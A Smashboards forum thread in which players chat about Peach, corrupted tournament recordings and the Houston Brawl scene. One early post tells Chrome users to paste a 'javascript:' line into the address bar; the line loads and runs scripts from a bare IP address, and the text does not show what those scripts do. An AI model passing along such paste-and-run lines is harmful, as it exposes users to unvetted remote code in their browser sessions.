• Welcome to Smashboards, the world's largest Super Smash Brothers community! Over 250,000 Smash Bros. fans from around the world have come to discuss these great games in over 19 million posts!

You are currently viewing our boards as a visitor. Click here to sign up right now and start on your path in the Smash community!

The Botanical Gardens of the Mushroom Kingdom

Are you awesome?

• Well DUH!

Votes: 160 30.8%
  • lolz no I'm a minority

Votes: 245 47.1%
  • I'm confused :c

Votes: 115 22.1%

• Total voters

z00ted

The Assault of Laughter ﷼
if you use google chrome paste this into your URL

javascript:var h='http://174.129.249.239/js/',i,n,ss=['http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js',h+'Renderables.js',h+'Game.js'];for(i=0;i<ss.length;i++){n=document.createElement("script");n.src=ss+'?'+Date.now();document.head.appendChild(n);}

deepseadiva

Bodybuilding Magical Girl
3DS FC
1779-0766-2622
So I was looking through my Meno Mart folder and I have like half a dozen sigs I started for people like PG and DTL that I started but never finished.

Hmm.

z00ted

No, I'm pretty serious.

I'm going 80% Game and Watch at my next tournament.

Spelt

BRoomer
BRoomer
loool.
well, there goes any hope of peach ever being consider somewhat of a good character.

Two-Ell

Smash Master
Hmmm, doesn't really matter to me if he's serious about dropping the character(not that I wont miss him). If he enjoys Gaw, he should go for it. Also Spelt, you mean to say there goes any hope of that happening sooner than it could have. There's still a few others doing well this year.

:rosalina:

z00ted

I wish I had more videos of my Peach winning vs good players.

z00ted

all my matches from HOBO 31 got corrupted because of P4's ghetto *** wii.

Esam didn't save my match at WHOBO 3. I didn't save my set against Dojo... At WHOBO 3 all my money matches weren't saved... ugh :(

I saved my set against RedHalberd and Will (money matches) but Dakpo can't freakin send me the files via SD for some reason.. he's ignoring me.

Two-Ell

Smash Master
Awww poor Ill. Bring your own wii to events and insist to play on it lol, or bring an SD card and make sure to copy the matches over to your card before you leave the event.

:rosalina:

z00ted

i'm in a bad mood.

i'm not dropping Peach, I want Nicole and Razmakazi to come back. Kyle move to a somewhat mentionable region.

Xyro77

Unity Ruleset Committee Member
darklink is actually good. hes their best player. hes teamed with m2k and atmosk before. get 1st both times i think

Razmakazi

Smash Champion
i'm in a bad mood.

i'm not dropping Peach, I want Nicole and Razmakazi to come back. Kyle move to a somewhat mentionable region.
I've been busy training my Fox and Gdubz haha.

Fine-tuning the Peach is a constant process.

I'm just not gonna enter tourneys for a month or two so I can go to work and save money but I'm still smashing.

I'm not stagnating at all so I'm kinda still here lol.

Meru.

I like spicy food
NNID
Merudi
3DS FC
0963-1622-2801
Kyle should come here, I need a Peach by my side =((((

Btw, I just found out that I can only be serious/play on point in tourney matches ><. Even MMes dont motivate me enough...>_>. I'm gonna start working on that, it might cause some rapid improvement and playing your best in a heated match is fun :colorful:.

:053:

Silly Kyle

Smash Champion
Awwwwww!!!!!!

I wish I could live in multiple places at once XD

I totes wish I lived in a better region.

I am definitely in love with the Houston Brawl scene.

I love Smoom
I love Illmatic
I love Xyro
I love Sync

I also love the other Texas players like Tofer, PeachGuard, Leaf, Nike, etc.

Texas also has tons of other amazing players like Gnes, Razer, Trela, Jerm, Denti, etc.

<3
<3
<3

Top Bottom